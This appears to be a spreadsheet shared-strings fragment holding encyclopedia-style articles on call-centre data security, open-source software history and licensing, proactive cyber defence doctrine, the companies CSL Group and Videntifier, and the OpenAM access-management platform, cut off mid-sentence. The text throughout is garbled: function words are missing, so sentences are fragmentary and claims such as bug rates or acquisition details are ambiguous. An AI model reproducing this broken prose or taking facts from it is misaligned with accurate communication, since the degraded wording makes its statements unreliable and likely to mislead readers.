    <t>information security emerged significant concern banks, mobile phone companies businesses call centers business process outsourcing, bpo. there instances theft personal data reported call centers. britain's financial services authority examined standards india april 2005 banking code standards board audited eight india-based call centers 2006, handling million calls month examinations extend africa-based call centers staffed workers indian origin. bcsb report stated "customer data subject level security high risk complex processes subject higher levels scrutiny similar activities onshore."india's nasscom said take breach security extremely seriously assist police probe. common countermeasures there three identifiable types illicit activities concerning fraud emanating call centers: crooks pretend legitimate call centres. hackers gain access call centre information illegal means call centre agents illegally misuse information access call centres. party software implementation, allowing "back-doors" entered remotely, sometimes "credentials" security.while items mostly subject police action, call centres internal procedures minimise risk. such mitigation measures include limited creating paperless environment, preventing employees writing removing information ensuring work processes done computer, without record anything forms notes. prohibiting cellphones cameras floor. prohibiting paper, pens digital recording devices brought onto floor. preventing internet access employees floor. limiting functionality access personal computers terminals used call center agents (for example, disabling ports). companies also data loss prevention software block attempts download, copy, transmit sensitive electronic data. every call center undoubtedly unique, organization’s requirements. nearly cases, biometric-based multi-modal platform solution call center dramatically improve fraud prevention. bringing seamless, multi-modal biometrics customers, agents ivr, prevent fraud losses, reduce average handle times, contain calls within ivr, deliver markedly better customer experiences phone, anywhere. also globalization business process outsourcing india references external links bpo: india data security cost skyrockets india acts call centre fraud offshore outsourcing: savings, risk</t>
  </si>
  <si>
    <t>Open-source software</t>
  </si>
  <si>
    <t>open-source software (oss) computer software released license copyright holder grants users rights use, study, change, distribute software source code anyone purpose. open-source software developed collaborative public manner. open-source software prominent example open collaboration, meaning capable user able participate online development, making number possible contributors indefinite. ability examine code facilitates public trust software.open-source software development bring diverse perspectives beyond single company. 2008 report standish group stated adoption open-source software models resulted savings billion year consumers.open source code used studying allows capable users adapt software personal needs similar user scripts custom style sheets allow sites, eventually publish modification fork users similar preferences, directly submit possible improvements pull requests. history 1990s: foundation open source initiative early days computing, programmers developers shared software order learn evolve field computing. example, unix included operating system source code users. eventually, open-source notion moved wayside commercialization software years 1970–1980. however, academics still often developed software collaboratively. examples donald knuth 1979 typesetting system richard stallman 1983 operating system. 1997, eric raymond published cathedral bazaar, reflective analysis hacker community free-software principles. paper received significant attention early 1998, factor motivating netscape communications corporation release popular netscape communicator internet suite free software. this source code subsequently became basis behind seamonkey, mozilla firefox, thunderbird kompozer. netscape's prompted raymond others look bring free software foundation's free software ideas perceived benefits commercial software industry. they concluded fsf's social activism appealing companies like netscape, looked rebrand free software movement emphasize business potential sharing collaborating software source code. term chose "open source", soon adopted bruce perens, publisher o'reilly, linus torvalds, others. open source initiative founded february 1998 encourage term evangelize open-source principles.while open source initiative sought encourage term evangelize principles adhered commercial software vendors found increasingly threatened concept freely distributed software universal access application's source code. microsoft executive allchin publicly stated 2001 "open source intellectual property destroyer. can't imagine something could worse software business intellectual-property business." however, free open-source software historically played role outside mainstream private software development, companies large microsoft begun develop official open-source presences internet. ibm, oracle, google, state farm companies serious public stake today's competitive open-source market. there significant shift corporate philosophy concerning development foss.the free-software movement launched 1983. 1998, group individuals advocated term free software replaced open-source software (oss) expression less ambiguous comfortable corporate world. software developers want publish software open-source license, anybody also develop software understand internal functioning. with open-source software, generally, anyone allowed create modifications port operating systems instruction architectures, share others cases, market scholars casson ryan pointed several policy-based reasons adoption open source particular, heightened value proposition open source (when compared proprietary formats) following categories: security affordability transparency perpetuity interoperability flexibility localization particularly context local governments (who make software decisions). casson ryan argue "governments inherent responsibility fiduciary duty taxpayers" includes careful analysis factors deciding purchase proprietary software implement open-source option.the open source definition presents open-source philosophy defines terms use, modification redistribution open-source software. software licenses grant rights users would otherwise reserved copyright copyright holder. several open-source software licenses qualified within boundaries open source definition. prominent popular example general public license (gpl), "allows free distribution condition developments applications licence", thus also free.the open source label came strategy session held april 1998, palo alto reaction netscape's january 1998 announcement source code release navigator mozilla). group individuals session included o'reilly, linus torvalds, paquin, jamie zawinski, larry wall, brian behlendorf, sameer parekh, eric allman, greg olson, paul vixie, john ousterhout, guido rossum, philip zimmermann, john gilmore eric raymond. they used opportunity release navigator's source code clarify potential confusion caused ambiguity word "free" english. many people claimed birth internet, since 1969, started open-source movement, others distinguish open-source free software movements.the free software foundation (fsf), started 1985, intended word "free" mean freedom distribute "free free speech") freedom cost "free free beer"). since great deal free software already (and still free charge, free software became associated zero cost, seemed anti-commercial.the open source initiative (osi) formed february 1998 eric raymond bruce perens. with least years evidence case histories closed software development versus open development already provided internet developer community, presented "open source" case commercial businesses, like netscape. hoped label "open source", term suggested christine peterson foresight institute strategy session, would eliminate ambiguity, particularly individuals perceive "free software" anti-commercial. they sought bring higher profile practical benefits freely available source code, wanted bring major software businesses high-tech industries open source. perens attempted register "open source" service mark osi, attempt impractical trademark standards. meanwhile, presentation raymond's paper upper management netscape—raymond discovered read press release, called netscape barksdale's later day—netscape released navigator source code open source, favorable results. definitions open source initiative's (osi) definition recognized several governments internationally standard facto definition. addition, many world's largest open-source-software projects contributors, including debian, drupal association, freebsd foundation, linux foundation, opensuse foundation, mozilla foundation, wikimedia foundation, wordpress foundation committed upholding osi's mission open source definition affiliate agreement.osi uses open source definition determine whether considers software license open source. definition based debian free software guidelines, written adapted primarily perens. perens base writing "four freedoms" free software foundation (fsf), widely available later.under perens' definition, open source broad software license makes source code available general public relaxed non-existent restrictions modification code. explicit "feature" open source puts restrictions distribution organization user, order enable rapid evolution software.despite initially accepting richard stallman flatly opposes term "open source" applied refer "free software". although agrees terms describe "almost category software", stallman considers equating terms incorrect misleading. stallman also opposes professed pragmatism open source initiative, fears free software ideals freedom community threatened compromising fsf's idealistic standards software freedom. considers free software subset open-source software, richard stallman explained software, example, developed open source, despite give users freedom restricts them), thus qualify free software. open-source software licensing when author contributes code open-source project (e.g., apache.org) explicit license (e.g., apache contributor license agreement) implicit license (e.g. open-source license project already licensing code). some open-source projects take contributed code license, actually require joint assignment author's copyright order accept code contributions project.examples free software license open-source licenses include apache license, license, general public license, lesser general public license, license, eclipse public license mozilla public license. proliferation open-source licenses negative aspect open-source movement often difficult understand legal implications differences licenses. with 180,000 open-source projects available 1400 unique licenses, complexity deciding manage open-source within "closed-source" commercial enterprises dramatically increased. some home-grown, others modeled mainstream foss licenses berkeley software distribution ("bsd"), apache, mit-style (massachusetts institute technology), general public license ("gpl"). view this, open-source practitioners starting classification schemes foss licenses grouped (typically based existence obligations imposed copyleft provision; strength copyleft provision).an important legal milestone open source free software movement passed 2008, federal appeals court ruled free software licenses definitely legally binding conditions copyrighted work, therefore enforceable existing copyright law. result, end-users violate licensing conditions, license disappears, meaning infringing copyright. despite licensing risk, commercial software vendors using open-source software commercial products fulfilling license terms, e.g. leveraging apache license. certifications certification help build user confidence. certification could applied simplest component, whole software system. united nations university international institute software technology, initiated project known "the global desktop project". this project aims build desktop interface every end-user able understand interact with, thus crossing language cultural barriers. project would improve developing nations' access information systems. unu/iist hopes achieve without compromise quality software introducing certifications. open-source software development development model 1997 essay cathedral bazaar, open-source evangelist eric raymond suggests model developing known bazaar model. raymond likens development software traditional methodologies building cathedral, "carefully crafted individual wizards small bands mages working splendid isolation". suggests software developed using bazaar style, described great babbling bazaar differing agendas approaches."in traditional model development, called cathedral model, development takes place centralized way. roles clearly defined. roles include people dedicated designing (the architects), people responsible managing project, people responsible implementation. traditional software engineering follows cathedral model. bazaar model, however, different. model, roles clearly defined. gregorio robles suggests software developed using bazaar model exhibit following patterns: users treated co-developers users treated like co-developers access source code software. furthermore, users encouraged submit additions software, code fixes software, reports, documentation, etc. having co-developers increases rate software evolves. linus's states, "given enough eyeballs bugs shallow." this means many users view source code, eventually find bugs suggest them. note users advanced programming skills, furthermore, user's machine provides additional testing environment. this testing environment offers ability find bug. early releases first version software released early possible increase one's chances finding co-developers early. frequent integration code changes integrated (merged shared code base) often possible avoid overhead fixing large number bugs project life cycle. some open-source projects nightly builds integration done automatically daily basis. several versions there least versions software. there buggier version features stable version fewer features. buggy version (also called development version) users want immediate latest features, willing accept risk using code thoroughly tested. users co-developers, reporting bugs providing fixes. high modularization general structure software modular allowing parallel development independent components. dynamic decision-making structure there need decision-making structure, whether formal informal, makes strategic decisions depending changing user requirements factors. compare extreme programming.data suggests, however, quite democratic bazaar model suggests. analysis five billion bytes free/open-source code 31,999 developers shows code written active authors. average number authors involved project 5.1, median advantages disadvantages open-source software usually easier obtain proprietary software, often resulting increased use. additionally, availability open-source implementation standard increase adoption standard. also helped build developer loyalty developers feel empowered sense ownership product.moreover, lower costs marketing logistical services needed oss. good tool promote company's image, including commercial products. development approach helped produce reliable, high quality software quickly inexpensively.open-source development offers potential quicken innovation creation innovation social value. france instance, policy incentivized government favor free open-source software increased nearly 600,000 contributions year, generating social value increasing quantity quality open-source software. this policy also estimated increase tech startups increase number people employed sector.it said reliable since typically thousands independent programmers testing fixing bugs software. open source dependent company author originally created even company fails, code continues exist developed users. also, uses open standards accessible everyone; thus, problem incompatible formats exist proprietary software. flexible modular systems allow programmers build custom interfaces, abilities innovative since open-source programs product collaboration among large number different programmers. divergent perspectives, corporate objectives, personal goals speeds innovation.moreover, free software developed accordance purely technical requirements. require thinking commercial pressure often degrades quality software. commercial pressures make traditional software developers attention customers' requirements security requirements, since features somewhat invisible customer.it sometimes said open-source development process well defined stages development process, system testing documentation ignored. however true small (mostly single programmer) projects. larger, successful projects define enforce least rules need make teamwork possible. complex projects rules strict reviewing even minor change independent developers.not initiatives successful; example, sourcexchange eazel. software experts researchers convinced open source's ability produce quality systems identify unclear process, late defect discovery lack empirical evidence important problems (collected data concerning productivity quality). also difficult design commercially sound business model around open-source paradigm. consequently, technical requirements satisfied ones market. terms security, open source allow hackers know weaknesses loopholes software easily closed-source software. depends control mechanisms order create effective performance autonomous agents participate virtual organizations. development tools development, tools used support development product development process itself.revision control systems concurrent versions system (cvs) later subversion (svn) examples tools, often open source, help manage source code files changes files software project. projects frequently stored "repositories" hosted published source-code-hosting facilities launchpad, github, gitlab, sourceforge.open-source projects often loosely organized "little formalised process modelling support", utilities issue trackers often used organize open-source software development. commonly used bugtrackers include bugzilla redmine.tools mailing lists provide means coordination among developers. centralized code hosting sites also social features allow developers communicate. organizations some "more prominent organizations" involved development include apache software foundation, creators apache server; linux foundation, nonprofit 2012 employed linus torvalds, creator linux operating system kernel; eclipse foundation, home eclipse software development platform; debian project, creators influential debian gnu/linux distribution; mozilla foundation, home firefox browser; ow2, european-born community developing open-source middleware. organizations tend sophisticated governance model membership often formed legal entity members.open source software institute membership-based, non-profit (501 (c)(6)) organization established 2001 promotes development implementation open source software solutions within federal, state local government agencies. ossi's efforts focused promoting adoption open-source software programs policies within federal government defense homeland security communities.open source america group created raise awareness united states federal government benefits open-source software. their stated goals encourage government's open source software, participation open-source software projects, incorporation open-source community dynamics increase government transparency.mil-oss group dedicated advancement creation military. funding companies whose business centers development open-source software employ variety business models solve challenge make money providing software definition licensed free charge. each business strategies rests premise users open-source technologies willing purchase additional software features proprietary licenses, purchase services elements value complement open-source software core business. this additional value limited enterprise-grade features up-time guarantees (often service-level agreement) satisfy business compliance requirements, performance efficiency gains features available open source version, legal protection (e.g., indemnification copyright patent infringement), professional support/training/consulting typical proprietary software applications. comparisons software licensing/development models closed source proprietary software debate open source closed source (alternatively called proprietary software) sometimes heated. four reasons provided open source business conference survey) individuals organizations choose open-source software are: lower cost security vendor 'lock better qualitysince innovative companies longer rely heavily software sales, proprietary software become less necessity. such, things like open-source content management system—or cms—deployments becoming commonplace. 2009, white house switched system proprietary system drupal open source cms. further, companies like novell (who traditionally sold software old-fashioned way) continually debate benefits switching open-source availability, already switched part product offering open source code. way, open-source software provides solutions unique specific problems. such, reported enterprise-level companies open-source software offerings capacity. with market shift, critical systems beginning rely open-source offerings, allowing greater funding (such department homeland security grants) help "hunt security bugs." according pilot study organizations adopting adopting) oss, following factors statistical significance observed manager's beliefs: attitudes toward outcomes, influences behaviors others, ability act.proprietary source distributors started develop contribute open-source community market share shift, need reinvent models order remain competitive.many advocates argue open-source software inherently safer person view, edit, change code. study linux source code 0.17 bugs 1000 lines code proprietary software generally scores 20–30 bugs 1000 lines. free software according free software movement's leader, richard stallman, main difference choosing term (i.e. either "open source" "free software") lets others know one's goals are: "open source development methodology; free software social movement." nevertheless, significant overlap open source software free software.the said term "open source" fosters ambiguity different kind confuses mere availability source freedom use, modify, redistribute hand, "free software" term criticized ambiguity word "free" "available cost", seen discouraging business adoption, historical ambiguous usage term.developers used alternative terms free open source software (foss), free/libre open source software (floss), consequently, describe open-source software also free software. while definition open source software similar fsf's free software definition based debian free software guidelines, written adapted primarily bruce perens input eric raymond others.the term "open source" originally intended trademarkable; however, term deemed descriptive, trademark exists. would prefer people treat open source trademark, describe software licensed approved license.osi certified trademark licensed people distributing software licensed license listed open source initiative's list. open-source versus source-available although definition "open-source software" widely accepted, small number people organizations term refer software source available viewing, legally modified redistributed. such software often referred source-available, shared source, term coined microsoft 2001. while 2007 microsoft's shared source initiative licenses certified osi, licenses program still source-available only. open-sourcing open-sourcing propagating open source movement, often referring releasing previously proprietary software open source/free software license, also refer programming open source software installing open source software. notable software packages, previously proprietary, open sourced include: netscape navigator, code became basis mozilla mozilla firefox browsers staroffice, became base openoffice.org office suite libreoffice global file system, originally gpl'd, made proprietary 2001(?), 2004 re-gpl'd. become maxdb, distributed (and owned) mysql interbase database, open sourced borland 2000 presently exists commercial product open-source fork (firebird)before changing license software, distributors usually audit source code third party licensed code would remove obtain permission relicense. backdoors malware also removed easily discovered release code. current applications adoption widely used open-source software open-source software projects built maintained network volunteer programmers widely used free well commercial products. prime examples open-source products apache http server, e-commerce platform oscommerce, internet browsers mozilla firefox chromium (the project vast majority development freeware google chrome done) full office suite libreoffice. successful open-source products gnu/linux operating system, open-source unix-like operating system, derivative android, operating system mobile devices. industries, open-source software norm. extensions non-software while term "open source" applied originally source code software, applied many areas open source ecology, movement decentralize technologies human them. however, often misapplied areas different competing principles, overlap partially. principles underlie open-source software found many ventures, open-source hardware, wikipedia, open-access publishing. collectively, principles known open source, open content, open collaboration: "any system innovation production relies goal-oriented loosely coordinated participants, interact create product service) economic value, make available contributors non-contributors alike."this "culture" ideology takes view principles apply generally facilitate concurrent input different agendas, approaches, priorities, contrast centralized models development typically used commercial companies. also references further reading androutsellis-theotokis, stephanos; spinellis, diomidis; kechagia, maria; gousios, georgios (2010). open source software: survey 10,000 feet (pdf). foundations trends technology, information operations management. vol. 187–347. doi:10.1561/0200000026. isbn 978-1-60198-484-5. coleman, gabriella. coding freedom: ethics aesthetics hacking (princeton 2012) fadi deek; james mchugh (2008). open source: technology policy. cambridge: cambridge university press. isbn 978-0-511-36775-5. chris dibona ockman mark stone, (1999). open sources: voices open source revolution. o'reilly. isbn 978-1-56592-582-3. joshua gay, (2002). free software, free society: selected essays richard stallman. boston: press, free software foundation. isbn 978-1-882114-98-6. understanding foss editor sampathkumar coimbatore india benkler, yochai (2002), "coase's penguin, linux nature firm." yale journal 112.3 (dec 2002): p367(78) adobe format) engelhardt, sebastian (2008). "the economic properties software", jena economic research papers, volume (2008), number 2008-045 (pdf). lerner, tirole, (2002): 'some simple economics open source', journal industrial economics 50(2), 197–234 välimäki, mikko (2005). rise open source licensing: challenge intellectual property software industry (pdf). turre publishing. archived original (pdf) march 2009. polley, barry december 2007). "open source discussion paper version 1.0" (pdf). zealand ministry justice. archived original (pdf) february 2018. retrieved december 2007. {{cite journal}}: cite journal requires |journal= (help) rossi, (2006): decoding free/open-source software puzzle: survey theoretical empirical contributions, bitzer schröder, eds, 'the economics open source software development', 15–55. open sources: voices open source revolution online book containing essays prominent members open-source community berry, (2004). contestation code: preliminary investigation discourse free software open software movement, critical discourse studies, volume 1(1). schrape, jan-felix (2017). "open source projects incubators innovation. from niche phenomenon integral part software industry" (pdf). stuttgart: research contributions organizational sociology innovation studies 2017-03. sustainable open source, confluence article providing guidelines fair participation open source ecosystem, radovan semancik external links open source initiative's definition open source free open source research community many online research papers open source open-source software curlie</t>
  </si>
  <si>
    <t>Proactive cyber defence</t>
  </si>
  <si>
    <t>proactive cyber defence means acting anticipation oppose attack cyber cognitive domains. proactive cyber defence understood options offensive defensive measures. includes interdicting, disrupting deterring attack threat's preparation attack, either pre-emptively self-defence. common methods include cyber deception, attribution, threat hunting adversarial pursuit. mission pre-emptive proactive operations conduct aggressive interception disruption activities adversary using: psychological operations, managed information dissemination, precision targeting, information warfare operations, computer network exploitation, active threat reduction measures. proactive defense strategy meant improve information collection stimulating reactions threat agents provide strike options well enhance operational preparation real virtual battlespace. proactive cyber defence measure detecting obtaining information cyber attack, also impending cyber operation determining origin operation involves launching pre-emptive, preventive, cyber counter-operation. offensive capacity includes manipulation and/or disruption networks systems purpose limiting eliminating adversary's operational capability. this capability required guarantee one's freedom action cyber domain. cyber-attacks launched repel attack (active defence) support operational action. proactive cyber defence differs active defence, meaning pre-emptive (not waiting attack occur). distinction active cyber defence offensive cyber operations (oco) later requires legislative exceptions undertake. hence, offensive cyber capabilities developed collaboration industry facilitated private sector. but, operations often nation-states. cyber defense strategically, cyber defence refers operations conducted cyber domain support mission objectives. main difference cyber security cyber defence cyber defence requires shift network assurance (security) mission assurance. cyber defence focuses sensing, detecting, orienting, engaging adversaries order assure mission success outmanoeuver adversary. this shift security defence requires strong emphasis intelligence, reconnaissance, integration staff activities include intelligence, operations, communications, planning. defensive cyber operations refer activities global information infrastructure help protect institutions' electronic information information infrastructures matter mission assurance. defensive cyber normally involve direct engagement adversary. active cyber operations refers activities global information infrastructure degrade, disrupt, influence, respond, interfere capabilities, intentions, activities foreign individual, state, organization, terrorist groups. active cyber defence decisively engages adversary includes adversarial pursuit activities. history term proactive fifth century, b.c., advocated foreknowledge (predictive analysis) part winning strategy. warned planners must precise understanding active threat "remain ignorant enemy's condition". thread proactive defense spun throughout teachings. psychiatrist viktor frankl likely first term proactive 1946 book man's search meaning distinguish taking responsibility one's circumstances rather attributing one's condition external factors. later 1982, united states department defense (dod) used "proactive" contrary concept "reactive" assessing risk. framework risk management "proactive" meant taking initiative acting rather reacting threat events. conversely "reactive" measures respond stimulus past events rather predicting event. military science considers defence science-art thwarting attack. furthermore, doctrine poses party attacks enemy attack could called active-defence. defence also euphemism carry negative connotation offensive war. usage broadened concept proactive defence include military issues including offensive, implicitly referred active-defence. politically, concept national self-defence counter aggression refers defensive involving pre-emptive offensive strikes possible criterion 'just theory'. proactive defence moved beyond theory, practice theatres operation. 1989 stephen covey's study transformed meaning proactive situation becomes source confrontation crisis". since then, "proactive" placed opposition words "reactive" "passive". origins cyber derived "cybernetics", word originally coined group scientists norbert wiener made popular wiener's book 1948, cybernetics control communication animal machine. cyberspace typically refers vast growing logical domain composed public private networks; means independently managed networks linked together internet. definition cyberspace extended include network-space point, path, eventual access public internet. under definition, cyberspace becomes virtually every networked device world, devoid network interface entirely. with rapid evolution information warfare operations doctrine 1990s, begun proactive preemptive cyber defence concepts used policymakers scholars. current status national strategy secure cyberspace, book written george bush, published february 2003 outlining theinitial framework organizing prioritizing efforts secure cyberspace. highlighted necessity public-private partnerships. book, proactive threads include call deter malicious activity prevent cyber attacks america's critical infrastructures. notion "proactive defence" rich history. hype "proactive cyber defence" reached zenith around 1994, auspices information warfare. much current doctrine related proactive cyber defence fully developed 1995. discussions around proactive defence literature much less "proactive" earlier discussions 1994. present-day proactive cyber defence strategy conceived within context rich discussion preceded existing doctrine real proactive cyber defence programs evolved globally past decade. founding members canada's interdepartmental committee information warfare, robert garigue dave mcmahon pointed "strategic listening, core intelligence, proactive defence provide time precision. conversely, reacting surprise ineffective, costly leaves options. strategic deterrence needs credible offensive, proactive defence information peacekeeping capability project power influence globally cyberspace defence nation. similarly, deterrence diplomacy required right dosage dissuade purposeful interference national critical cyber infrastructures influence democratic process foreign states. vulnerabilities equities intelligence agencies, national security agency, criticized buying stockpiling zero-day vulnerabilities keeping secret developing mainly offensive capabilities instead defensive measures and, thereby, helping patch vulnerabilities. this criticism widely reiterated recognized 2017 wannacry ransomware attack. proactive pre-emptive operations notion proactive pre-emptive operations group (p2og) emerged report defense science board's (dsb) 2002 briefing. briefing reported dupont inside pentagon september 2002, also discussed william arkin angeles times october 2002. angeles times subsequently quoted u.s. secretary defense donald rumsfeld revealing creation "proactive, pre-emptive operations group". mission conduct aggressive, proactive, pre-emptive operations interdiction disruption threat using: psychological operations, managed information dissemination, precision targeting, information warfare operations. today, proactive defence strategy means improving information collection stimulating reactions threat agents, provide strike options enhance operational preparation real well virtual battle space. p2og recommended constituted hundred highly specialized people unique technical intelligence skills. group would overseen white house's deputy national security adviser would carry missions coordinated secretary defence. proactive measures, according actions taken directly preventive stage attack enemy. other topics (relevance international relations [ir]) discipline world politics notions pre-emptive cyber defence topics important concepts need examined living dynamic international system actors (countries) update threat perceptions according developments technological realm. given logic employed frequently policymakers, countries prefer using pre-emptive measures targeted. this topic extensively studied political scientists focusing power transition theory (ptt), organski kugler first discussed powerful countries start attack balance power changes favor relatively weaker rising state. although relevance explain pre-emptive cyber defence policies, theory still difficult apply comes cyber defence entirely easy understand relative power differentials international actors terms cyber capabilities. hand, still explain security perceptions united states china, rising country, terms pre-emptive cyber defence policies. many scholars already begun examine likelihood cyber countries examined relevance similar international relations theories. also references sources proactive holistic approach strategic cyber defense"., bradley wood, sami saydjari, victoria stavridou phd., international "apt0 study analysis darknet space predictive indicators cyber threat activity" (pdf). communication security establishment, bell canada secdev cyber corp. 2011. "apt1 exposing china's cyber espionage units" (pdf). mandiant. 2004. arquilla; ronfeldt. "cyberwar coming, rand corporation". journal comparative strategy. "combating robot networks their controllers: pstp08-0107esec (pstp)". bell canada. 2010. "best practices computer network defense: incident detection response". busey adm. james (ret.) (october 1994). "information warfare calculus mandates protective actions, presidents commentary". signal. afcea: campen, alan (october 1992). "the first information war". fairfax, afcea international press. "challenges inter-governmental multilevel governance ioe, 2017". clairvoyance cyber corp. "cyber forechecking". frontline magazine. clairvoyance cyber corp. 2017. "information warfare 2.0, cyber 2017". clairvoyance cyber corp. "combating robot networks their controllers: pstp08-0107esec 2010 (pstp)". "acritical infrastructure: understanding component parts, vulnerabilities, operating risks, interdependencies". tyson macaulay (author) bn-13: 978-1420068351 "defensive information warfare (diw) management plan". l.2. defense information systems agency. august 1994. sections appendices. directorate army doctrine update: information operations doctrine review, 2005 future security environment 2025 (fse) supreme allied commander transformation branch head strategic analysis intelligence sub-division garigue, lieutenant(n) july 1995). "information warfare: developing conceptual framework". draft discussion, sits/adm(dis). garigue, robert. "canadian forces information warfare- developing conceptual framework 1994". garigue, robert; mackie, andrew april 1999). "from provincial action national security: national information protection agenda securing government cyberspace, conference, information protection assurance white paper". garigue, robert (1992). strategy, decisions evolution information systems". dsis government canada. garigue, robert. "information warfare: developing conceptual framework. discussion paper". garigue, robert (1995). "information warfare theory concepts, ottawa: office assistant deputy minister defense information services, dnd, government canada report". garigue, robert (1992). strategy, decisions evolution information systems. technical document. dsis government canada". government accounting office. technology assessment: cyber security critical infrastructure protection. 2004 (http://www.gao.gov/new.items/d04321.pdf) garigue, robert (1993). "information warfare, developing conceptual framework". macaulay, tyson— critical infrastructure: understanding component parts, interdependencies, vulnerabilities operating risks, pages auherbach publishing, june 2008 macaulay, tyson— security converged networks: requirements information communications technology security assurance, pages, auherbach publishing, june 2006 mcmahon, dave, rohozinski, rafal combating robot networks controllers, bell canada secdev group, pages, august 2004 mcmahon, dave, rohozinski, rafal dark space report, bell canada secdev group pages, december 2012 mcmahon, dave, canadian national proactive defense strategy, bell canada, pages, august 2004 mcmahon, dave (2014). "think secdev" (pdf). cyber corp. mcmahon, david, cyber threat: internet security home business, hardcover 2000 national infrastructure security coordination center niscc briefing 08/2005 issued june 2005, targeted trojan email attacks, titan rain nato cooperative cyber defence centre excellence nato cooperative cyber defence centre excellence, tallinn manual international applicable cyber warfare 2013 "best practices computer network defense: incident detection response". nato. network centric warfare: developing leveraging information superiority, david alberts, john garstka, frederick stein, c4isr cooperative research program, february 2000 networks netwars: future terror, crime, militancy, edited john arquilla, david ronfeldt, rand corporation, 1999 omand, david, jamie bartlett carl miller, “introducing social media intelligence (socmint)” published: 2012. proactive cyber defense perfect storm. www.cyberthreat.ca david mcmahon april 2008 ""ghostnet" large-scale cyber spying operation discovered march 2009" (pdf). secdev. secdev, “shadows cloud”. complex ecosystem cyber espionage systematically targeted compromised computer systems india, offices dalai lama, united nations, several countries. http://www.nartv.org/mirror/shadows-in-the-cloud.pdf https://ccdcoe.org/cyber-definitions.html archived 2016-03-08 wayback machine office homeland security; national strategy secure cyberspace, february 2003 office information assurance critical infrastructure protection federal technology service general services administration before subcommittee terrorism technology government information committee judiciary united states senate july 2001 schwartau, winn. "information warfare chaos electronic superhighway "thunder's mouth press, york, 1994 science application international corporation (saic), "planning considerations defensive information warfare information assurance december 1993, pages. taipale, k.a. executive director, center advanced studies nyls, bantle (march 29–30, 2006). "seeking symmetry fourth generation warfare: information operations ideas". insct symposium. subcommittee emerging threats capabilities, committee armed services united states senate hearing cyber security critical infrastructure protection, martin faga, executive vice president, mitre corporation, march 2000 toffler, alvin, heidi toffler. anti-war. york: warner books, 1995. 370pp. (u102 .t641 1995) what works implementing u.s. national strategy secure cyberspace case studies success cyber crime cyber espionage, sans consensus, document version december 2007</t>
  </si>
  <si>
    <t>CSL Group Ltd</t>
  </si>
  <si>
    <t>group limited encompasses security health operating united kingdom, ireland, netherlands sweden.csl began supplier dual signalling burglar alarms. pioneered dual signalling, wherein alarm system communicates monitoring station using wired (telephone internet) wireless (gprs/gsm) communications increased reliability. among uk's suppliers signalling intruder alarms, managing signalling residential commercial installations. history formed 1996 chris brookes simon banks. 2000, became vodafone service provider business partner. 2006 management buyout octopus investments successfully completed, allowing fund product development including gemini platform. during process, simon banks phil hollett previously director bought co-founder chris brookes.in january 2012, acquired bowmark capital £32m. companies plan work together next stage csl's development. simon banks phil hollett continue direct company support bowmark. following bowmark's investment 2011, invested significantly core fire security customer base. august 2016, acquired norland capital, iconiq capital capital partners. april 2017, announced acquisition emizon networks ltd. acquisition enhance csl's existing service greater capability, well underpinning csl's international growth ambitions.in december 2017, announced acquisition iqip, european provider based security telecommunication services.since january 2020, group supplying sim-cards security systems' hubs ajax systems, sold group limited group international investment group, consists security health. group currently operates united kingdom, republic ireland sweden. security pioneered move wired wireless technology electronic security industry established market leader. health offer wireless technology telecare market. operations operate west london headquarters logistics department based mountain south wales regional sales offices. employees well national sales team, also marketing, technical, finance departments london head office. their manufacturing distribution department based south wales whilst also telemarketing team based nottingham. references</t>
  </si>
  <si>
    <t>Videntifier</t>
  </si>
  <si>
    <t>videntifier icelandic software company developed method quickly identify videos images automatically. videntifier's patented technology store fingerprints enormous amounts video content images, identify reference material within seconds. usually single frame enough identify entire video. currently, company headquartered reykjavik (iceland) office vilnius, lithuania. history videntifier technologies founded september 2007 provides technology search track vast amounts multimedia data efficiently. previously, company focused providing services police departments engaged locating illegal images videos seized computers. company roots database laboratories reykjavík university and, later, opened secondary irisa-cnrs, rennes. 2005, videntifier technologies received prizes austrian genius competition "best business idea 2008" "innovation award 2008". 2008, videntifier technologies received golden award best business idea iceland.in 2013, videntifier technologies signed agreement interpol provide advanced imaging technology effort child sexual abuse material. references external links videntifier</t>
  </si>
  <si>
    <t>ANT catalog</t>
  </si>
  <si>
    <t>OpenAM</t>
  </si>
  <si>
    <t>openam open-source access management, entitlements federation server platform. supported open identity platform community.openam (open access management) originated opensso, (open single sign-on) access management system created microsystems owned oracle corporation. openam fork initiated following oracle's purchase sun. history announced microsystems july 2005, opensso based java system access manager, core sun's commercial access management federation product, opensso enterprise (formerly access manager federation manager). july 2008, announced paid support regular "express" builds opensso. sun's stated intent express builds would released approximately every three months, allowing customers early access features.in september 2008, announced opensso enterprise 8.0, first commercial product derived opensso project. opensso enterprise released november 2008.opensso enterprise "security" category developer.com product year 2009 awards.in 2009, shortly oracle's acquisition announced, opensso enterprise update released. oracle completed acquisition microsystems february 2010 shortly thereafter removed opensso downloads website unannounced policy change. opensso forked openam, developed supported forgerock.forgerock announced february 2010 would continue develop support opensso oracle chosen discontinue development project. forgerock renamed product openam oracle retained rights name opensso. forgerock also announced would continue delivering original microsystems roadmap. sponsored forgerock 2016.in november 2016, without official statement, forgerock closed openam source code, renamed openam forgerock access management began distributing source code paid, commercial license.several free open-source forks openam exist common development distribution license: open identity platform community, opted carry openam community name forgerock re-branded commercial product. wren security community, opted re-brand openam "wren:am" avoid confusion forgerock's original product well open identity platform fork. features openam supports following features: authentication openam supports authentication methods out-of-the-box. openam flexibility chain methods together along adaptive risk scoring, create custom authentication modules based jaas (java authentication authorization service) open standard. integrated windows authentication supported enable completely seamless heterogeneous application environment. authorization openam provides authorization policy basic, simple, coarse-grained rules highly advanced, fine-grained entitlements based xacml (extensible access control mark-up language). authorization policies abstracted application, allowing developers quickly change policy needed without modification underlying application. adaptive risk authentication adaptive risk authentication module used assess risks authentication process, determine whether require user complete authentication steps. adaptive risk authentication determines, based risk scoring, whether information user required login. example, risk score calculated based address range, access device, account idle time, etc., applied authentication chain. federation federation services securely share identity information across heterogeneous systems domain boundaries using standard identity protocols (saml, ws-federation, openid connect). quickly configure service provider cloud service connections fedlet, oauth2 client, oauth2 provider, openig federation gateway. openig federation gateway component openam providing saml2 compliant enforcement point allows businesses quickly saml2 support applications little knowledge standard. addition, need modify application install plugin agent application container. out-of the-box tools enable simple task-based configuration suite, adfs2, along many integration targets. openam also multi-protocol hub, translating providers rely other, older standards. oauth2 support open standard modern federation authorization, allowing users share private resources tokens instead credentials. single sign-on (sso) openam provides multiple mechanisms sso, whether requirement enabling cross-domain single organization, across multiple organizations federation service. openam supports multiple options enforcing policy protecting resources, including policy agents reside application servers, proxy server, openig (identity gateway). openig runs self-contained gateway protects applications installing policy agent possible. high availability enable high availability large-scale mission-critical deployments, openam provides 